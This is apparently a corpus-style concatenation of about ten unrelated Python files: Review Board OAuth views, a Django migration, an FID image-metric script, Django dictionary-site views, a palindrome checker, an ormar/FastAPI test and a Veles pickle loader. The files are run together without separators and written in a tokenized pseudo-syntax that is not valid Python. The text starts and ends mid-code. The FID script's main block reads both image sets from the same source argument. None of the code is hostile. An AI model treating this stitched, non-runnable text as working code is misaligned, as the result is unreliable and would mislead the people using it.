This is to prevent the user from navigating away from the privacy page before making decisions. """<line_sep><return><not>self.is_user_missing_consent<block_end>@cached_property<def_stmt>is_user_missing_consent self<block_start>"""Whether or not the user is missing consent."""<line_sep><return>is_consent_missing(self.request.user)<block_end><block_end>@login_required@preview_email(prepare_password_changed_mail)<def_stmt>preview_password_changed_email request<block_start><return>{'user':request.user }<block_end>@login_required@feature_required(oauth2_service_feature)<def_stmt>edit_oauth_app request app_id=<none><block_start>"""Create or edit an OAuth2 application. Args: request (django.http.HttpRequest): The current HTTP request. app_id (int, optional): The ID of the application to edit. If this argument is ``None`` a new application will be edited. Returns: django.http.HttpResponse: The rendered view. """<line_sep># If we import this at global scope, it will cause issues with admin sites # being automatically registered. <import_from_stmt>reviewboard.oauth.admin ApplicationAdmin<if_stmt>app_id<block_start>app=get_object_or_404(Application pk=app_id user=request.user )<line_sep>form_cls=UserApplicationChangeForm<line_sep>fieldsets=ApplicationAdmin.fieldsets<block_end><else_stmt><block_start>app=<none><line_sep>form_cls=UserApplicationCreationForm<line_sep>fieldsets=ApplicationAdmin.add_fieldsets<block_end><if_stmt>request.method<eq>'POST'<block_start>form_data=request.POST.copy()<line_sep>form=form_cls(user=request.user data=form_data initial=<none> instance=app)<if_stmt>form.is_valid()<block_start>app=form.save()<if_stmt>app_id<is><not><none><block_start>next_url=OAuth2Page.get_absolute_url()<block_end><else_stmt><block_start>next_url=reverse('edit-oauth-app' args=(app.pk ))<block_end><return>HttpResponseRedirect(next_url)<block_end><block_end><else_stmt><block_start>form=form_cls(user=request.user data=<none> initial=<none> instance=app)<line_sep># Show a warning at the top of the form when the form is disabled for # security. # # We don't need to worry about full_clean not being called (which would # be if we went through form.errors) because this form will never be # saved. <if_stmt>app<and>app.is_disabled_for_security<block_start>form._errors=ErrorDict({'__all__':form.error_class([form.DISABLED_FOR_SECURITY_ERROR] ) })<block_end><block_end><return>render(request=request template_name='accounts/edit_oauth_app.html' context={'app':app 'form':form 'fieldsets':filter_fieldsets(form=form_cls fieldsets=fieldsets) 'oauth2_page_url':OAuth2Page.get_absolute_url() 'request':request })<block_end>
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack # overflow. g=globals()<line_sep>print(g)<line_sep>
expected_output={'current-eta-records':0 'excess-packets-received':60 'excess-syn-received':0 'total-eta-fnf':2 'total-eta-idp':2 'total-eta-records':4 'total-eta-splt':2 'total-packets-out-of-order':0 'total-packets-received':80 'total-packets-retransmitted':0}<line_sep>
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_stmt>logging<import_from_stmt>django.db models migrations<line_sep>logging.basicConfig(format="%(asctime)-15s %(message)s")<line_sep>logger=logging.getLogger(__file__)<line_sep>logger.setLevel(logging.INFO)<line_sep>BULK_SIZE=2500<def_stmt>move_metadata apps schema_editor<block_start>IEDocument=apps.get_model('corpus' 'IEDocument')<line_sep>IEDocumentMetadata=apps.get_model('corpus' 'IEDocumentMetadata')<line_sep>documents=IEDocument.objects.all()<line_sep>total=documents.count()<line_sep>objects_to_create=[]<line_sep>logger.info("Creating missing documents metadata objects")<for_stmt>i,document enumerate(documents.iterator())<block_start><if_stmt>i%BULK_SIZE<eq>0<block_start>logger.info("Created {} out of {}".format(i total))<if_stmt>objects_to_create<block_start>IEDocumentMetadata.objects.bulk_create(objects_to_create)<line_sep>objects_to_create=[]<block_end><block_end>objects_to_create.append(IEDocumentMetadata(title=document.title url=document.url items=document.metadata document_tmp=document))<block_end><if_stmt>objects_to_create<block_start>logger.info("Created {} out of {}".format(i+1 total))<line_sep>IEDocumentMetadata.objects.bulk_create(objects_to_create)<block_end>logger.info("Updating documents to point to their metadata objects")<line_sep>doc_mtds=IEDocumentMetadata.objects.filter(document_tmp__metadata_fk__isnull=<true>)<line_sep>total=doc_mtds.count()<for_stmt>i,doc_mtd enumerate(doc_mtds)<block_start><if_stmt>i%BULK_SIZE<eq>0<block_start>logger.info("Updated {} out of {}".format(i total))<block_end>IEDocument.objects.filter(pk=doc_mtd.document_tmp_id).update(metadata_fk=doc_mtd.id)<block_end>logger.info("Updated {} out of {}".format(total total))<block_end><class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('corpus' '0013_create_metadata_model') ]<line_sep>operations=[migrations.RunPython(move_metadata) ]<block_end>
<import_from_future_stmt> absolute_import division print_function<import_stmt>torch<import_stmt>warnings<import_from_stmt>tqdm tqdm<import_stmt>pathlib<import_from_stmt>scipy linalg<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>os<line_sep>os.environ['TF_CPP_MIN_LOG_LEVEL']='2'<def_stmt>check_or_download_inception inception_path<block_start>''' Checks if the path to the inception file is valid, or downloads the file if it is not present. '''<line_sep>INCEPTION_URL='http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'<if_stmt>inception_path<is><none><block_start>inception_path='/tmp'<block_end>inception_path=pathlib.Path(inception_path)<line_sep>model_file=inception_path/'classify_image_graph_def.pb'<if_stmt><not>model_file.exists()<block_start>print("Downloading Inception model")<import_from_stmt>urllib request<import_stmt>tarfile<line_sep>fn,_=request.urlretrieve(INCEPTION_URL)<with_stmt>tarfile.open(fn mode='r')<as>f<block_start>f.extract('classify_image_graph_def.pb' str(model_file.parent))<block_end><block_end><return>str(model_file)<block_end><def_stmt>create_inception_graph pth<block_start>"""Creates a graph from saved GraphDef file."""<line_sep># Creates graph from saved graph_def.pb. <with_stmt>tf.io.gfile.GFile(pth 'rb')<as>f<block_start>graph_def=tf.compat.v1.GraphDef()<line_sep>graph_def.ParseFromString(f.read())<line_sep>_=tf.import_graph_def(graph_def name='FID_Inception_Net')<block_end><block_end><def_stmt>calculate_activation_statistics images sess batch_size=50 verbose=<false><block_start>"""Calculation of the statistics used by the FID. Params: -- images : Numpy array of dimension (n_images, hi, wi, 3). The values must lie between 0 and 255. -- sess : current session -- batch_size : the images numpy array is split into batches with batch size batch_size. A reasonable batch size depends on the available hardware. -- verbose : If set to True and parameter out_step is given, the number of calculated batches is reported. Returns: -- mu : The mean over samples of the activations of the pool_3 layer of the incption model. -- sigma : The covariance matrix of the activations of the pool_3 layer of the incption model. """<line_sep>act=get_activations(images sess batch_size verbose)<line_sep>mu=np.mean(act axis=0)<line_sep>sigma=np.cov(act rowvar=<false>)<line_sep><return>mu sigma<block_end># code for handling inception net derived from # https://github.com/openai/improved-gan/blob/master/inception_score/model.py <def_stmt>_get_inception_layer sess<block_start>"""Prepares inception net for batched usage and returns pool_3 layer. """<line_sep>layername='FID_Inception_Net/pool_3:0'<line_sep>pool3=sess.graph.get_tensor_by_name(layername)<line_sep>ops=pool3.graph.get_operations()<for_stmt>op_idx,op enumerate(ops)<block_start><for_stmt>o op.outputs<block_start>shape=o.get_shape()<if_stmt>shape._dims<ne>[]<block_start>shape=[s.value<for>s shape]<line_sep>new_shape=[]<for_stmt>j,s enumerate(shape)<block_start><if_stmt>s<eq>1<and>j<eq>0<block_start>new_shape.append(<none>)<block_end><else_stmt><block_start>new_shape.append(s)<block_end><block_end>o.__dict__['_shape_val']=tf.TensorShape(new_shape)<block_end><block_end><block_end><return>pool3<block_end># ------------------------------------------------------------------------------- <def_stmt>get_activations images sess batch_size=200 verbose=<false><block_start>"""Calculates the activations of the pool_3 layer for all images. Params: -- images : Numpy array of dimension (n_images, hi, wi, 3). The values must lie between 0 and 256. -- sess : current session -- batch_size : the images numpy array is split into batches with batch size batch_size. A reasonable batch size depends on the disposable hardware. -- verbose : If set to True and parameter out_step is given, the number of calculated batches is reported. Returns: -- A numpy array of dimension (num images, 2048) that contains the activations of the given tensor when feeding inception with the query tensor. """<line_sep>inception_layer=_get_inception_layer(sess)<line_sep>n_images=images.shape[0]<if_stmt>batch_size<g>n_images<block_start>print("warning: batch size is bigger than the data size. setting batch size to data size")<line_sep>batch_size=n_images<block_end>n_batches=n_images<floordiv>batch_size<line_sep>pred_arr=np.empty((n_images 2048))<for_stmt>i tqdm(range(n_batches))<block_start><if_stmt>verbose<block_start>print("\rPropagating batch %d/%d"%(i+1 n_batches) end="" flush=<true>)<block_end>start=i<times>batch_size<if_stmt>start+batch_size<l>n_images<block_start>end=start+batch_size<block_end><else_stmt><block_start>end=n_images<block_end>batch=images[start:end]<line_sep>pred=sess.run(inception_layer {'FID_Inception_Net/ExpandDims:0':batch})<line_sep>pred_arr[start:end]=pred.reshape(batch_size -1)<block_end><if_stmt>verbose<block_start>print(" done")<block_end><return>pred_arr<block_end># ------------------------------------------------------------------------------- <def_stmt>calculate_frechet_distance mu1 sigma1 mu2 sigma2 eps=1e-6<block_start>"""Numpy implementation of the Frechet Distance. The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1) and X_2 ~ N(mu_2, C_2) is d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)). Stable version by <NAME>. Params: -- mu1 : Numpy array containing the activations of the pool_3 layer of the inception net ( like returned by the function 'get_predictions') for generated samples. -- mu2 : The sample mean over activations of the pool_3 layer, precalcualted on an representive data set. -- sigma1: The covariance matrix over activations of the pool_3 layer for generated samples. -- sigma2: The covariance matrix over activations of the pool_3 layer, precalcualted on an representive data set. Returns: -- : The Frechet Distance. """<line_sep>mu1=np.atleast_1d(mu1)<line_sep>mu2=np.atleast_1d(mu2)<line_sep>sigma1=np.atleast_2d(sigma1)<line_sep>sigma2=np.atleast_2d(sigma2)<assert_stmt>mu1.shape<eq>mu2.shape "Training and test mean vectors have different lengths"<assert_stmt>sigma1.shape<eq>sigma2.shape "Training and test covariances have different dimensions"<line_sep>diff=mu1-mu2<line_sep># product might be almost singular covmean,_=linalg.sqrtm(sigma1.dot(sigma2) disp=<false>)<if_stmt><not>np.isfinite(covmean).all()<block_start>msg="fid calculation produces singular product; adding %s to diagonal of cov estimates"%eps<line_sep>warnings.warn(msg)<line_sep>offset=np.eye(sigma1.shape[0])<times>eps<line_sep>covmean=linalg.sqrtm((sigma1+offset).dot(sigma2+offset))<block_end># numerical error might give slight imaginary component <if_stmt>np.iscomplexobj(covmean)<block_start><if_stmt><not>np.allclose(np.diagonal(covmean).imag 0 atol=1e-3)<block_start>m=np.max(np.abs(covmean.imag))<line_sep><raise>ValueError("Imaginary component {}".format(m))<block_end>covmean=covmean.real<block_end>tr_covmean=np.trace(covmean)<line_sep><return>diff.dot(diff)+np.trace(sigma1)+np.trace(sigma2)-2<times>tr_covmean<block_end><def_stmt>pt_to_np imgs<block_start>'''normalizes pytorch image in [-1, 1] to [0, 255]'''<line_sep>normalized=[((img/2+0.5)<times>255).clamp(0 255)<for>img imgs]<line_sep><return>np.array([img.permute(1 2 0).numpy()<for>img normalized])<block_end><def_stmt>compute_fid_given_images fake_images real_images<block_start>'''requires that the image batches are numpy format, normalized to 0, 255'''<line_sep>inception_path=check_or_download_inception(<none>)<line_sep>create_inception_graph(inception_path)<with_stmt>tf.Session()<as>sess<block_start>sess.run(tf.global_variables_initializer())<if_stmt>isinstance(fake_images tuple)<block_start>m1,s1=fake_images<block_end><else_stmt><block_start>m1,s1=calculate_activation_statistics(fake_images sess)<block_end><if_stmt>isinstance(real_images tuple)<block_start>m2,s2=real_images<block_end><else_stmt><block_start>m2,s2=calculate_activation_statistics(real_images sess)<block_end><block_end><return>calculate_frechet_distance(m1 s1 m2 s2)<block_end><def_stmt>compute_fid_given_path path<block_start><with_stmt>np.load(path)<as>data<block_start>fake_imgs=data['fake']<line_sep>real_imgs=data['real']<block_end><return>compute_fid_given_images(fake_imgs real_imgs)<block_end><def_stmt>load_from_path source<block_start>root='/data/vision/torralba/ganprojects/placesgan/tracer/utils/fid_stats/'<line_sep>path=os.path.join(root f'{source}_stats.npz')<if_stmt>os.path.exists(path)<block_start>print('Loading statistics from ' path)<with_stmt>np.load(path)<as>data<block_start><return>data['m'] data['s']<block_end><block_end><else_stmt><block_start>print("Stats not found in path" path)<line_sep>exit()<block_end><block_end><def_stmt>compute_fid source1 source2<block_start><if_stmt>isinstance(source1 str)<block_start>source1=load_from_path(source1)<block_end><if_stmt>isinstance(source1 torch.Tensor)<block_start>source1=pt_to_np(source1)<block_end><if_stmt>isinstance(source2 str)<block_start>source2=load_from_path(source2)<block_end><if_stmt>isinstance(source2 torch.Tensor)<block_start>source2=pt_to_np(source2)<block_end><return>compute_fid_given_images(source1 source2)<block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<import_from_stmt>PIL Image<import_from_stmt>torchvision transforms<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--source')<line_sep>parser.add_argument('--target')<line_sep>args=parser.parse_args()<line_sep>transform=transforms.Compose([transforms.Resize((224 224)) transforms.ToTensor() transforms.Normalize((0.5 0.5 0.5) (0.5 0.5 0.5)) ])<line_sep>images1=[]<for_stmt>file_name tqdm(os.listdir(args.source))<block_start><if_stmt>file_name.lower().endswith(('.png' 'jpeg' '.jpg'))<block_start>path=os.path.join(args.source file_name)<line_sep>images1.append(transform(Image.open(path).convert('RGB')))<block_end><block_end>images1=torch.stack(images1)<line_sep>images2=[]<for_stmt>file_name tqdm(os.listdir(args.source))<block_start><if_stmt>file_name.lower().endswith(('.png' 'jpeg' '.jpg'))<block_start>path=os.path.join(args.source file_name)<line_sep>images2.append(transform(Image.open(path).convert('RGB')))<block_end><block_end>images2=torch.stack(images2)<line_sep>result=compute_fid(images1 images2)<line_sep>print(result)<with_stmt>open('fid_results.txt' 'a+')<as>f<block_start>f.write(args.source+args.target+':\n')<line_sep>f.write(str(result)+'\n')<block_end><block_end>
<import_from_stmt>django.contrib messages<as>notifications<import_from_stmt>django.contrib.auth.mixins LoginRequiredMixin<import_from_stmt>django.contrib.messages.views SuccessMessageMixin<import_from_stmt>django.db.models F Q<import_from_stmt>django.db.models.functions Coalesce<import_from_stmt>django.http Http404<import_from_stmt>django.shortcuts get_object_or_404 redirect<import_from_stmt>django.urls reverse reverse_lazy<import_from_stmt>django.utils timezone<import_from_stmt>django.utils.translation gettext gettext_lazy<as>_<import_from_stmt>django.views.generic CreateView FormView UpdateView<import_from_stmt>dictionary.forms.edit EntryForm PreferencesForm<import_from_stmt>dictionary.models Author Comment Entry Topic<import_from_stmt>dictionary.utils time_threshold<class_stmt>UserPreferences(LoginRequiredMixin SuccessMessageMixin UpdateView)<block_start>model=Author<line_sep>form_class=PreferencesForm<line_sep>template_name="dictionary/user/preferences/index.html"<line_sep>success_message=_("settings are saved, dear")<line_sep>success_url=reverse_lazy("user_preferences")<def_stmt>get_object self queryset=<none><block_start><return>self.request.user<block_end><def_stmt>form_invalid self form<block_start>notifications.error(self.request gettext("we couldn't handle your request. try again later."))<line_sep><return>super().form_invalid(form)<block_end><block_end><class_stmt>EntryCreateMixin<block_start>model=Entry<line_sep>form_class=EntryForm<def_stmt>form_valid self form<block_start>""" User sent new entry, whose topic may or may not be existent. If topic exists, adds the entry and redirects to the entry permalink, otherwise the topic is created if the title is valid. Entry.save() sets created_by field of the topic. """<line_sep>draft_pk=self.request.POST.get("pub_draft_pk" "")<line_sep>publishing_draft=draft_pk.isdigit()<if_stmt>(<not>publishing_draft)<and>(self.topic.exists<and>self.topic.is_banned)# Cannot check is_banned before checking its existence. <block_start>notifications.error(self.request _("we couldn't handle your request. try again later."))<line_sep><return>self.form_invalid(form)<block_end>status=self.request.user.entry_publishable_status<if_stmt>status<is><not><none><block_start>notifications.error(self.request status extra_tags="persistent")<if_stmt>publishing_draft<block_start><return>redirect(reverse("entry_update" kwargs={"pk":int(draft_pk)}))<block_end><return>self.form_invalid(form)<block_end><if_stmt>publishing_draft<block_start><try_stmt><block_start>entry=Entry.objects_all.get(pk=int(draft_pk) is_draft=<true> author=self.request.user topic__is_banned=<false>)<line_sep>entry.content=form.cleaned_data["content"]<line_sep>entry.is_draft=<false><line_sep>entry.date_created=timezone.now()<line_sep>entry.date_edited=<none><block_end><except_stmt>Entry.DoesNotExist<block_start>notifications.error(self.request _("we couldn't handle your request. try again later."))<line_sep><return>self.form_invalid(form)<block_end><block_end><else_stmt># Creating a brand new entry. <block_start>entry=form.save(commit=<false>)<line_sep>entry.author=self.request.user<if_stmt>self.topic.exists<block_start>entry.topic=self.topic<block_end><else_stmt><block_start><if_stmt><not>self.topic.valid<block_start>notifications.error(self.request _("curses to such a topic anyway.") extra_tags="persistent")<line_sep><return>self.form_invalid(form)<block_end>entry.topic=Topic.objects.create_topic(title=self.topic.title)<block_end><block_end>entry.save()<line_sep>notifications.info(self.request _("the entry was successfully launched into stratosphere"))<line_sep><return>redirect(reverse("entry-permalink" kwargs={"entry_id":entry.id}))<block_end><def_stmt>form_invalid self form<block_start><if_stmt>form.errors<block_start><for_stmt>err form.errors["content"]<block_start>notifications.error(self.request err extra_tags="persistent")<block_end><block_end><return>super().form_invalid(form)<block_end><block_end><class_stmt>EntryCreate(LoginRequiredMixin EntryCreateMixin FormView)<block_start>template_name="dictionary/edit/entry_create.html"<def_stmt>dispatch self request *args **kwargs<block_start>self.extra_context={"title":self.request.POST.get("title" "")}<line_sep><return>super().dispatch(request *args **kwargs)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["recent_drafts"]=(Entry.objects_all.filter(Q(date_created__gte=time_threshold(hours=24))|Q(date_edited__gte=time_threshold(hours=24)) is_draft=<true> author=self.request.user ).select_related("topic").only("topic__title" "date_created" "date_edited").alias(last_edited=Coalesce(F("date_edited") F("date_created"))).order_by("-last_edited")[:5])<line_sep><return>context<block_end><def_stmt>form_valid self form<block_start><if_stmt><not>self.request.POST.get("pub_draft_pk" "").isdigit()# Topic object is only required if not publishing a draft. <block_start>self.topic=Topic.objects.get_or_pseudo(unicode_string=self.extra_context.get("title"))# noqa <block_end><return>super().form_valid(form)<block_end><block_end><class_stmt>EntryUpdate(LoginRequiredMixin UpdateView)<block_start>model=Entry<line_sep>form_class=EntryForm<line_sep>template_name="dictionary/edit/entry_update.html"<line_sep>context_object_name="entry"<def_stmt>form_valid self form<block_start>entry=form.save(commit=<false>)<if_stmt>self.request.user.is_suspended<or>entry.topic.is_banned<block_start>notifications.error(self.request gettext("you lack the required permissions."))<line_sep><return>super().form_invalid(form)<block_end><if_stmt>entry.is_draft<block_start>status=self.request.user.entry_publishable_status<if_stmt>status<is><not><none><block_start>notifications.error(self.request status extra_tags="persistent")<line_sep><return>super().form_invalid(form)<block_end>entry.is_draft=<false><line_sep>entry.date_created=timezone.now()<line_sep>entry.date_edited=<none><line_sep>notifications.info(self.request gettext("the entry was successfully launched into stratosphere"))<block_end><else_stmt><block_start>entry.date_edited=timezone.now()<block_end><return>super().form_valid(form)<block_end><def_stmt>form_invalid self form<block_start><for_stmt>error form.errors["content"]<block_start>notifications.error(self.request error)<block_end><return>super().form_invalid(form)<block_end><def_stmt>get_queryset self<block_start><return>Entry.objects_all.filter(author=self.request.user)<block_end><block_end><class_stmt>CommentMixin(LoginRequiredMixin SuccessMessageMixin)<block_start>model=Comment<line_sep>fields=("content" )<line_sep>template_name="dictionary/edit/comment_form.html"<def_stmt>form_invalid self form<block_start><for_stmt>error form.errors["content"]<block_start>notifications.error(self.request error)<block_end><return>super().form_invalid(form)<block_end><block_end><class_stmt>CommentCreate(CommentMixin CreateView)<block_start>success_message=_("the comment was successfully launched into stratosphere")<line_sep>entry=<none><def_stmt>dispatch self request *args **kwargs<block_start>self.entry=get_object_or_404(Entry.objects_published pk=self.kwargs.get("pk"))<if_stmt><not>(request.user.has_perm("dictionary.can_comment")<and>self.entry.topic.is_ama<and>request.user.is_accessible)<block_start><raise>Http404<block_end><return>super().dispatch(request *args **kwargs)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["entry"]=self.entry<line_sep><return>context<block_end><def_stmt>form_valid self form<block_start>comment=form.save(commit=<false>)<line_sep>comment.author=self.request.user<line_sep>comment.entry=self.entry<line_sep>comment.save()<line_sep><return>super().form_valid(form)<block_end><block_end><class_stmt>CommentUpdate(CommentMixin UpdateView)<block_start>success_message=_("the comment has been updated")<def_stmt>get_object self queryset=<none><block_start><return>get_object_or_404(Comment pk=self.kwargs.get(self.pk_url_kwarg) author=self.request.user)<block_end><def_stmt>form_valid self form<block_start><if_stmt>self.request.POST.get("delete")<block_start>self.object.delete()<line_sep>notifications.success(self.request gettext("the comment has been deleted"))<line_sep><return>redirect(self.object.entry.get_absolute_url())<block_end><if_stmt><not>self.request.user.is_accessible<block_start>notifications.error(self.request gettext("you lack the permissions to edit this comment. you might as well delete it?"))<line_sep><return>self.form_invalid(form)<block_end>comment=form.save(commit=<false>)<line_sep>comment.date_edited=timezone.now()<line_sep><return>super().form_valid(form)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["entry"]=self.object.entry<line_sep>context["updating"]=<true><line_sep><return>context<block_end><block_end>
<def_stmt>isPalindrome str<block_start>result=<false><if_stmt>str<eq>str[::-1]<block_start>result=<true><block_end><return>result<block_end>print("Please enter a string: ")<line_sep>x=input()<line_sep>flag=isPalindrome(x)<if_stmt>flag<block_start>print(x "is a Palindrome")<block_end><else_stmt><block_start>print(x "is NOT a Palindrome")<block_end>
<import_stmt>asyncio<import_from_stmt>typing List Optional<import_stmt>databases<import_stmt>pytest<import_stmt>sqlalchemy<import_from_stmt>fastapi FastAPI<import_from_stmt>starlette.testclient TestClient<import_stmt>ormar<import_from_stmt>tests.settings DATABASE_URL<line_sep>app=FastAPI()<line_sep>metadata=sqlalchemy.MetaData()<line_sep>database=databases.Database(DATABASE_URL force_rollback=<true>)<line_sep>app.state.database=database<line_sep>@app.on_event("startup")<async_keyword><def_stmt>startup <arrow><none><block_start>database_=app.state.database<if_stmt><not>database_.is_connected<block_start><await>database_.connect()<block_end><block_end>@app.on_event("shutdown")<async_keyword><def_stmt>shutdown <arrow><none><block_start>database_=app.state.database<if_stmt>database_.is_connected<block_start><await>database_.disconnect()<block_end><block_end><class_stmt>Category(ormar.Model)<block_start><class_stmt>Meta<block_start>tablename="categories"<line_sep>metadata=metadata<line_sep>database=database<block_end>id:int=ormar.Integer(primary_key=<true>)<line_sep>name:str=ormar.String(max_length=100)<block_end><class_stmt>Item(ormar.Model)<block_start><class_stmt>Meta<block_start>tablename="items"<line_sep>metadata=metadata<line_sep>database=database<block_end>id:int=ormar.Integer(primary_key=<true>)<line_sep>name:str=ormar.String(max_length=100)<line_sep>category:Optional[Category]=ormar.ForeignKey(Category nullable=<true>)<block_end>@pytest.fixture(autouse=<true> scope="module")<def_stmt>create_test_database <block_start>engine=sqlalchemy.create_engine(DATABASE_URL)<line_sep>metadata.create_all(engine)<line_sep><yield><line_sep>metadata.drop_all(engine)<block_end>@app.get("/items/" response_model=List[Item])<async_keyword><def_stmt>get_items <block_start>items=<await>Item.objects.select_related("category").all()<line_sep><return>items<block_end>@app.get("/items/raw/" response_model=List[Item])<async_keyword><def_stmt>get_raw_items <block_start>items=<await>Item.objects.all()<line_sep><return>items<block_end>@app.post("/items/" response_model=Item)<async_keyword><def_stmt>create_item item:Item<block_start><await>item.save()<line_sep><return>item<block_end>@app.post("/categories/" response_model=Category)<async_keyword><def_stmt>create_category category:Category<block_start><await>category.save()<line_sep><return>category<block_end>@app.get("/items/{item_id}")<async_keyword><def_stmt>get_item item_id:int<block_start>item=<await>Item.objects.get(pk=item_id)<line_sep><return>item<block_end>@app.put("/items/{item_id}")<async_keyword><def_stmt>update_item item_id:int item:Item<block_start>item_db=<await>Item.objects.get(pk=item_id)<line_sep><return><await>item_db.update(**item.dict())<block_end>@app.delete("/items/{item_id}")<async_keyword><def_stmt>delete_item item_id:int item:Item=<none><block_start><if_stmt>item<block_start><return>{"deleted_rows":<await>item.delete()}<block_end>item_db=<await>Item.objects.get(pk=item_id)<line_sep><return>{"deleted_rows":<await>item_db.delete()}<block_end><def_stmt>test_all_endpoints <block_start>client=TestClient(app)<with_stmt>client<as>client<block_start>response=client.post("/categories/" json={"name":"test cat"})<line_sep>category=response.json()<line_sep>response=client.post("/items/" json={"name":"test" "id":1 "category":category})<line_sep>item=Item(**response.json())<assert_stmt>item.pk<is><not><none><line_sep>response=client.get("/items/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0]<eq>item<line_sep>item.name="New name"<line_sep>response=client.put(f"/items/{item.pk}" json=item.dict())<assert_stmt>response.json()<eq>item.dict()<line_sep>response=client.get("/items/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0].name<eq>"New name"<line_sep>response=client.get("/items/raw/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0].name<eq>"New name"<assert_stmt>items[0].category.name<is><none><line_sep>response=client.get(f"/items/{item.pk}")<line_sep>new_item=Item(**response.json())<assert_stmt>new_item<eq>item<line_sep>response=client.delete(f"/items/{item.pk}")<assert_stmt>response.json().get("deleted_rows" "__UNDEFINED__")<ne>"__UNDEFINED__"<line_sep>response=client.get("/items/")<line_sep>items=response.json()<assert_stmt>len(items)<eq>0<line_sep>client.post("/items/" json={"name":"test_2" "id":2 "category":category})<line_sep>response=client.get("/items/")<line_sep>items=response.json()<assert_stmt>len(items)<eq>1<line_sep>item=Item(**items[0])<line_sep>response=client.delete(f"/items/{item.pk}" json=item.dict())<assert_stmt>response.json().get("deleted_rows" "__UNDEFINED__")<ne>"__UNDEFINED__"<line_sep>response=client.get("/docs/")<assert_stmt>response.status_code<eq>200<block_end><block_end>
#! /usr/bin/python ''' Data Normalization '''<import_from_stmt>sklearn preprocessing<def_stmt>normalize file_dataframe cols<block_start>''' Data Normalization. '''<for_stmt>col cols<block_start>preprocessing.normalize(file_dataframe[col] axis=1 norm='l2' copy=<false>)<block_end><return>file_dataframe<block_end>
# -*- coding: utf-8 -*- """ .. invisible: _ _ _____ _ _____ _____ | | | | ___| | | ___/ ___| | | | | |__ | | | |__ \ `--. | | | | __|| | | __| `--. \ \ \_/ / |___| |___| |___/\__/ / \___/\____/\_____|____/\____/ Created on Jan 25, 2015 Loaders which get data from pickles ███████████████████████████████████████████████████████████████████████████████ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ███████████████████████████████████████████████████████████████████████████████ """<import_stmt>pickle<import_stmt>numpy<import_stmt>six<import_from_stmt>zope.interface implementer<import_from_stmt>veles error<import_from_stmt>veles.compat from_none<import_from_stmt>veles.external.progressbar ProgressBar<import_from_stmt>veles.memory interleave<import_from_stmt>veles.loader.base CLASS_NAME Loader<import_from_stmt>veles.loader.image IImageLoader COLOR_CHANNELS_MAP<import_from_stmt>veles.loader.fullbatch FullBatchLoader IFullBatchLoader<import_from_stmt>veles.loader.fullbatch_image FullBatchImageLoader<line_sep>@implementer(IFullBatchLoader)<class_stmt>PicklesLoader(FullBatchLoader)<block_start>""" Loads samples from pickles for data set. """<def_stmt>__init__ self workflow **kwargs<block_start>super(PicklesLoader self).__init__(workflow **kwargs)<line_sep>self._test_pickles=list(kwargs.get("test_pickles" []))<line_sep>self._validation_pickles=list(kwargs.get("validation_pickles" []))<line_sep>self._train_pickles=list(kwargs.get("train_pickles" []))<line_sep>self._pickles=(self.test_pickles self.validation_pickles self.train_pickles)<block_end>@property<def_stmt>test_pickles self<block_start><return>self._test_pickles<block_end>@property<def_stmt>validation_pickles self<block_start><return>self._validation_pickles<block_end>@property<def_stmt>train_pickles self<block_start><return>self._train_pickles<block_end><def_stmt>reshape self shape<block_start><return>shape<block_end><def_stmt>transform_data self data<block_start><return>data<block_end><def_stmt>load_data self<block_start>pbar=ProgressBar(maxval=sum(len(p)<for>p self._pickles) term_width=40)<line_sep>self.info("Loading %d pickles..." pbar.maxval)<line_sep>pbar.start()<line_sep>loaded=[self.load_pickles(i self._pickles[i] pbar)<for>i range(3)]<line_sep>pbar.finish()<line_sep>self.info("Initializing the arrays...")<line_sep>shape=loaded[2][1][0].shape[1:]<for_stmt>i range(2)<block_start><if_stmt>loaded[i][0]<g>0<block_start>shi=loaded[i][1][0].shape[1:]<if_stmt>shape<ne>shi<block_start><raise>error.BadFormatError("TRAIN and %s sets have the different sample shape "<concat>"(%s vs %s)"%(CLASS_NAME[i] shape shi))<block_end><block_end><block_end>self.create_originals(self.reshape(shape))<line_sep>offsets=[0 0]<for_stmt>ds range(3)<block_start><if_stmt>loaded[ds][0]<eq>0<block_start><continue><block_end><for_stmt>arr loaded[ds][1]<block_start>self.original_data[offsets[0]:(offsets[0]+arr.shape[0])]=self.transform_data(arr)<line_sep>offsets[0]<augadd>arr.shape[0]<block_end><for_stmt>arr loaded[ds][2]<block_start>self.original_labels[offsets[1]:(offsets[1]+arr.shape[0])]=arr<line_sep>offsets[1]<augadd>arr.shape[0]<block_end><block_end><block_end><def_stmt>load_pickles self index pickles pbar<block_start>unpickled=[]<for_stmt>pick pickles<block_start><try_stmt><block_start><with_stmt>open(pick "rb")<as>fin<block_start>self.debug("Loading %s..." pick)<if_stmt>six.PY3<block_start>loaded=pickle.load(fin encoding='charmap')<block_end><else_stmt><block_start>loaded=pickle.load(fin)<block_end>unpickled.append(loaded)<line_sep>pbar.inc()<block_end><block_end><except_stmt>Exception<as>e<block_start>self.warning("Failed to load %s (part of %s set)"%(pick CLASS_NAME[index]))<line_sep><raise>from_none(e)<block_end><block_end>data=[]<line_sep>labels=[]<for_stmt>obj,pick zip(unpickled 